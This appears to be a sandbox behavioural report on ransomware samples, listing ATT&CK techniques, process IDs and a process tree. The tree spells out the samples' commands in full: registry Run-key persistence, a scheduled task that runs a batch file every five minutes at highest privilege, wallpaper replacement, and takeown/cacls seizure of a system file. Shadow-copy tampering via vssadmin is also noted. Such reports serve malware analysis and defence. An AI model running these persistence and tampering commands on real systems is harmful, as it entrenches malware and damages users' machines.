Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
7432	vssadmin.exe
6828	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
7704	taskkill.exe
15536	taskkill.exe
5036	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	PDFs Importantes.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 35 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
16140	schtasks.exe
7456	schtasks.exe
3484	schtasks.exe
5688	schtasks.exe
6960	schtasks.exe
10440	schtasks.exe
6536	schtasks.exe
16320	schtasks.exe
9504	schtasks.exe
6216	schtasks.exe
1656	schtasks.exe
6360	schtasks.exe
17924	schtasks.exe
5096	schtasks.exe
1288	schtasks.exe
7860	schtasks.exe
224	schtasks.exe
9680	schtasks.exe
6920	schtasks.exe
4224	schtasks.exe
5124	schtasks.exe
5648	schtasks.exe
5708	schtasks.exe
8688	schtasks.exe
10044	schtasks.exe
6728	schtasks.exe
7284	schtasks.exe
10596	schtasks.exe
15204	schtasks.exe
7288	schtasks.exe
7464	schtasks.exe
16336	schtasks.exe
17192	schtasks.exe
17668	schtasks.exe
9976	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3968	7zFM.exe
1984	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeRestorePrivilege	3968	7zFM.exe
Token: 35	3968	7zFM.exe
Token: SeSecurityPrivilege	3968	7zFM.exe
Token: SeDebugPrivilege	4344	taskmgr.exe
Token: SeSystemProfilePrivilege	4344	taskmgr.exe
Token: SeCreateGlobalPrivilege	4344	taskmgr.exe
Token: SeDebugPrivilege	1984	taskmgr.exe
Token: SeSystemProfilePrivilege	1984	taskmgr.exe
Token: SeCreateGlobalPrivilege	1984	taskmgr.exe
Token: 33	4344	taskmgr.exe
Token: SeIncBasePriorityPrivilege	4344	taskmgr.exe
Token: SeDebugPrivilege	2776	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3968	7zFM.exe
3968	7zFM.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
4344	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe
1984	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2960	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4344 wrote to memory of 1984	4344	taskmgr.exe	97
PID 4344 wrote to memory of 1984	4344	taskmgr.exe	97
PID 2776 wrote to memory of 2960	2776	powershell.exe	115
PID 2776 wrote to memory of 2960	2776	powershell.exe	115
PID 2960 wrote to memory of 2728	2960	cmd.exe	116
PID 2960 wrote to memory of 2728	2960	cmd.exe	116
PID 2960 wrote to memory of 2728	2960	cmd.exe	116
PID 2960 wrote to memory of 4188	2960	cmd.exe	117
PID 2960 wrote to memory of 4188	2960	cmd.exe	117
PID 4188 wrote to memory of 4116	4188	HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe	118
PID 4188 wrote to memory of 4116	4188	HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe	118
PID 4188 wrote to memory of 4116	4188	HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe	118
PID 2728 wrote to memory of 2816	2728	HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe	120
PID 2728 wrote to memory of 2816	2728	HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe	120
PID 2728 wrote to memory of 2816	2728	HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe	120
PID 2816 wrote to memory of 3324	2816	PDFs Importantes.exe	121
PID 2816 wrote to memory of 3324	2816	PDFs Importantes.exe	121
PID 2816 wrote to memory of 3324	2816	PDFs Importantes.exe	121
PID 3324 wrote to memory of 1208	3324	wmiintegrator.exe	122
PID 3324 wrote to memory of 1208	3324	wmiintegrator.exe	122
PID 3324 wrote to memory of 1208	3324	wmiintegrator.exe	122
PID 4116 wrote to memory of 4676	4116	GROWTO~2.EXE	123
PID 4116 wrote to memory of 4676	4116	GROWTO~2.EXE	123
PID 4116 wrote to memory of 4676	4116	GROWTO~2.EXE	123
PID 1208 wrote to memory of 1592	1208	wmihostwin.exe	124
PID 1208 wrote to memory of 1592	1208	wmihostwin.exe	124
PID 1208 wrote to memory of 1592	1208	wmihostwin.exe	124
PID 1592 wrote to memory of 4132	1592	wmimic.exe	125
PID 1592 wrote to memory of 4132	1592	wmimic.exe	125
PID 1592 wrote to memory of 4132	1592	wmimic.exe	125
PID 1592 wrote to memory of 2804	1592	wmimic.exe	126
PID 1592 wrote to memory of 2804	1592	wmimic.exe	126
PID 1592 wrote to memory of 2804	1592	wmimic.exe	126
PID 2804 wrote to memory of 1416	2804	wmisecure64.exe	129
PID 2804 wrote to memory of 1416	2804	wmisecure64.exe	129
PID 2804 wrote to memory of 1416	2804	wmisecure64.exe	129
PID 2804 wrote to memory of 3044	2804	wmisecure64.exe	131
PID 2804 wrote to memory of 3044	2804	wmisecure64.exe	131
PID 2804 wrote to memory of 3044	2804	wmisecure64.exe	131
PID 2804 wrote to memory of 2688	2804	wmisecure64.exe	133
PID 2804 wrote to memory of 2688	2804	wmisecure64.exe	133
PID 2804 wrote to memory of 2688	2804	wmisecure64.exe	133
PID 2804 wrote to memory of 2124	2804	wmisecure64.exe	135
PID 2804 wrote to memory of 2124	2804	wmisecure64.exe	135
PID 2804 wrote to memory of 2124	2804	wmisecure64.exe	135
PID 2804 wrote to memory of 3212	2804	wmisecure64.exe	137
PID 2804 wrote to memory of 3212	2804	wmisecure64.exe	137
PID 2804 wrote to memory of 3212	2804	wmisecure64.exe	137
PID 2804 wrote to memory of 1824	2804	wmisecure64.exe	139
PID 2804 wrote to memory of 1824	2804	wmisecure64.exe	139
PID 2804 wrote to memory of 1824	2804	wmisecure64.exe	139
PID 2804 wrote to memory of 3932	2804	wmisecure64.exe	141
PID 2804 wrote to memory of 3932	2804	wmisecure64.exe	141
PID 2804 wrote to memory of 3932	2804	wmisecure64.exe	141
PID 2960 wrote to memory of 636	2960	cmd.exe	143
PID 2960 wrote to memory of 636	2960	cmd.exe	143
PID 2960 wrote to memory of 636	2960	cmd.exe	143
PID 2960 wrote to memory of 752	2960	cmd.exe	144
PID 2960 wrote to memory of 752	2960	cmd.exe	144
PID 2960 wrote to memory of 752	2960	cmd.exe	144
PID 2960 wrote to memory of 3472	2960	cmd.exe	146
PID 2960 wrote to memory of 3472	2960	cmd.exe	146
PID 2960 wrote to memory of 3472	2960	cmd.exe	146
PID 2960 wrote to memory of 2712	2960	cmd.exe	147

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
10128	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00395.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3968

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4344
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Users\Admin\AppData\Roaming\PDFs Importantes.exe
      "C:\Users\Admin\AppData\Roaming\PDFs Importantes.exe" C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8293bf889e1b43b4ad26a136618a696f90a0d435d724fbff73d046b39be68d33.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2816
    - - C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe" unk
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3324
      - C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe" unk2
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1208
        
        C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe" unk3
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1592
        
        C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe" execute
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4132
        
        C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe
        
        "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe" autorun
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2804
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1416
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2688
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2124
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3212
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1824
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3932
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6420
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:9060
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8516
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:5456
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1656
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:1076
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6412
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:8644
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:9884
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:7404
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:9692
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:14604
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:14384
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:2424
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:15016
        
        C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
        9⤵
        
        PID:10308
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe
    HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-760b306fbea4ce9787589fd5e63bbf38a71f592fb67683b6e6cd05b6056ad92d.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4188
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GROWTO~2.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GROWTO~2.EXE
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4116
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GROWTO~2.EXE
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\GROWTO~2.EXE
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4676
- - C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Agent.gen-d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.exe
    HEUR-Trojan-Ransom.Win32.Agent.gen-d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.exe
    3⤵
    - Executes dropped EXE
    PID:636
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\Desktop\00395\HEUR-Trojan-Ransom.Win32.Agent.gen-d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.exe" "C:\Users\Admin\Desktop\00395\NWZVlWxF.exe"
      4⤵
      PID:5700
  - - C:\Users\Admin\Desktop\00395\NWZVlWxF.exe
      "C:\Users\Admin\Desktop\00395\NWZVlWxF.exe" -n
      4⤵
      PID:2784
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\79baEZZk.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      4⤵
      PID:1432
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\79baEZZk.bmp" /f
        5⤵
        
        PID:17592
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
        5⤵
        
        PID:9132
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        5⤵
        
        PID:9764
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\t9fuOCOU.vbs"
      4⤵
      PID:464
    - - C:\Windows\SysWOW64\wscript.exe
        
        wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\t9fuOCOU.vbs"
        5⤵
        
        PID:15324
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\edbwKqkI.bat" /sc minute /mo 5 /RL HIGHEST /F
        6⤵
        
        PID:16372
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\edbwKqkI.bat" /sc minute /mo 5 /RL HIGHEST /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6536
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
        6⤵
        
        PID:15432
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        7⤵
        
        PID:10380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00395\UC7dQazg.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
      4⤵
      PID:11920
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
        5⤵
        
        PID:15860
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
        5⤵
        Modifies file permissions
        
        PID:5628
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c iuNyTyE7.exe -accepteula "store.db" -nobanner
        5⤵
        
        PID:11708
